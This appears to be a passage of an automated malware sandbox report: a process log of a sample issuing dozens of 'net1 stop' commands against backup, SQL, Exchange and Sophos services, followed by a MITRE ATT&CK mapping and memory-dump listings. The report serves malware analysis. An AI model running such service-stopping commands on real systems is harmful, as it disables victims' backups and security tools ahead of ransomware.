1⤵
PID:5912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
1⤵
PID:5936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
1⤵
PID:5952

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
1⤵
PID:6164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:6180

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
1⤵
PID:5300

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:6324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
1⤵
PID:6364

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
1⤵
PID:6348

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:5864

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:6424

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2731531352112388270229290887-1244212867462789417-18704563031295213075-423927417"
1⤵
PID:2868

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
1⤵
PID:6512

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
1⤵
PID:6544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
1⤵
PID:6568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:6560

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
1⤵
PID:6596

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
1⤵
PID:6612

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:6640

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
1⤵
PID:6756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
1⤵
PID:6744

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
1⤵
PID:6820

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:6812

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
1⤵
PID:6860

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
1⤵
PID:6852

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
1⤵
PID:6804

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
1⤵
PID:6868

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
1⤵
PID:6884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
1⤵
PID:6876

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
1⤵
PID:6908

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-18227637921679821097-3462815661082899806-15155926611804931979-1331690271-2123081657"
1⤵
PID:2156

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-13647947491647922111-125788177318089990531656393780543079227-1731210932908371522"
1⤵
PID:1128

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-645639482-843622430-1507935901593333623-1711259286-989044816-1125891720-1514130273"
1⤵
PID:2104

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "839506709-635307366-1773168813-636867136-17614623620754390911129931221-1655920846"
1⤵
PID:4116

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/576-157-0x0000000001F40000-0x0000000001F41000-memory.dmp

Filesize
4KB

Download
memory/576-159-0x0000000002560000-0x0000000002561000-memory.dmp

Filesize
4KB

Download
memory/576-158-0x000000001AD70000-0x000000001AD71000-memory.dmp

Filesize
4KB

Download
memory/576-166-0x0000000001EA0000-0x0000000001EA1000-memory.dmp

Filesize
4KB

Download
memory/576-161-0x000000001ACF4000-0x000000001ACF6000-memory.dmp

Filesize
8KB

Download
memory/576-160-0x000000001ACF0000-0x000000001ACF2000-memory.dmp

Filesize
8KB

Download
memory/768-60-0x0000000000F60000-0x0000000000F61000-memory.dmp

Filesize
4KB

Download
memory/768-62-0x0000000000C60000-0x0000000000C62000-memory.dmp

Filesize
8KB

Download
memory/1644-86-0x0000000002690000-0x0000000002691000-memory.dmp

Filesize
4KB

Download
memory/1644-70-0x0000000002590000-0x0000000002591000-memory.dmp

Filesize
4KB

Download
memory/1644-167-0x000000001AC10000-0x000000001AC12000-memory.dmp

Filesize
8KB

Download
memory/1644-64-0x000007FEFC181000-0x000007FEFC183000-memory.dmp

Filesize
8KB

Download
memory/1644-87-0x000000001AA30000-0x000000001AA31000-memory.dmp

Filesize
4KB

Download
memory/1644-65-0x0000000002300000-0x0000000002301000-memory.dmp

Filesize
4KB

Download
memory/1644-74-0x000000001AB60000-0x000000001AB61000-memory.dmp

Filesize
4KB

Download
memory/1644-71-0x0000000002650000-0x0000000002651000-memory.dmp

Filesize
4KB

Download
memory/1644-168-0x000000001AC14000-0x000000001AC16000-memory.dmp

Filesize
8KB

Download
memory/1644-69-0x0000000002440000-0x0000000002441000-memory.dmp

Filesize
4KB

Download
memory/1644-67-0x000000001ABC0000-0x000000001ABC2000-memory.dmp

Filesize
8KB

Download
memory/1644-68-0x000000001ABC4000-0x000000001ABC6000-memory.dmp

Filesize
8KB

Download
memory/1644-66-0x000000001AC40000-0x000000001AC41000-memory.dmp

Filesize
4KB

Download